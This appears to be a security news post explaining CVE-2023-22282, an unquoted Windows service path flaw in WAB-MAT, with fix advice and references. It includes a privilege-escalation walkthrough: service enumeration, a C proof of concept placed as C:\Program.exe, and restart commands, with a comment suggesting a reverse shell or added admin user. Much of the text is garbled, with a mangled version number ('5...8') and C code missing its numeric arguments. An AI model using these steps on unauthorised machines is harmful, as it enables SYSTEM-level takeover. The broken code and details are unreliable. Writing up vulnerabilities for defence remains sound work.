CVE CyberSecurity Database News

CVE-2023-22282 - Exploiting Unquoted Service Path in WAB-MAT 5...8 for Privilege Escalation

Poster -

In early 2023, a critical vulnerability—CVE-2023-22282—was found in WAB-MAT version 5...8 and earlier. The flaw is due to a common but dangerous mistake in how Windows programs start services: the "unquoted service path" problem. When a Windows service runs with a path that includes spaces and isn’t surrounded by quotes, an attacker can sneak their own program onto the system and get it to run with high (service-level) privileges.

This long read explains how this happens, gives you actual code to reproduce it, and provides official references so you can dig even deeper.

What is WAB-MAT?

WAB-MAT is a Windows application often used in automation or industrial settings. To work, it installs itself as a system service—meaning it can start automatically with Windows and runs with SYSTEM or high privileges.

On Windows, if a service is installed like this

Path: C:\Program Files\WAB-MAT\wabmat.exe

But the installer does not wrap the path in quotes ("..."), Windows may *misinterpret* the program to run, because of the spaces in the path.

C:\Program Files\WAB-MAT\wabmat.exe

3. etc.

You can list all services and check their paths with

Get-WmiObject win32_service | Select-Object Name, PathName | findstr WAB-MAT

If you see the path

C:\Program Files\WAB-MAT\wabmat.exe


(without quotes), it’s vulnerable.

Suppose you control the C:\ drive. You create a file called Program.exe

// filename: Program.c
#include <windows.h>
int main() {
    MessageBoxA(, "You just got SYSTEM!", "CVE-2023-22282 Exploit", );
    // Or run any code you want here - reverse shell, add admin user, etc.
    return ;
}

Compile it

cl Program.c /link /OUT:"C:\Program.exe"


*(Use Visual Studio Command Prompt or MinGW for compilation)*

Restart the vulnerable WAB-MAT service

net stop "WAB-MAT"
net start "WAB-MAT"

Result: Windows, following its flawed logic, checks for "C:\Program.exe" first and launches your code *as SYSTEM*.

Real-World Impact

If an attacker has write access to any folder in the path (C:\ in this case), they can escalate their privileges and possibly take over the computer!

Fixing the Problem

Developers:  
Always quote service paths with spaces!

Service installation command

sc create WAB-MAT binPath= "\"C:\Program Files\WAB-MAT\wabmat.exe\""

System Administrators:

Audit services with tools

- PowerUp.ps1:

Invoke-ServiceUnquoted -Verbose

- WinPEAS:

Official CVE entry:

https://jvn.jp/en/jp/JVN47116984/

Microsoft explanation:

Unquoted Service Paths

Guidance for Devs (MSDN):

Sc.exe Create

Conclusion

CVE-2023-22282 in WAB-MAT 5...8 is a classic but high-risk Windows mistake. If you use or manage WAB-MAT, fix the path or update as soon as possible.

Tip:  
Run regular service audits and teach developers about quoting paths in Windows—it’s a small fix with huge security benefits.


If you want to test or fix this in your environment, remember: never exploit vulnerabilities on machines you don't own or have permission to test.

Timeline

Published on: 04/11/2023 09:15:00 UTC
Last modified on: 04/18/2023 14:04:00 UTC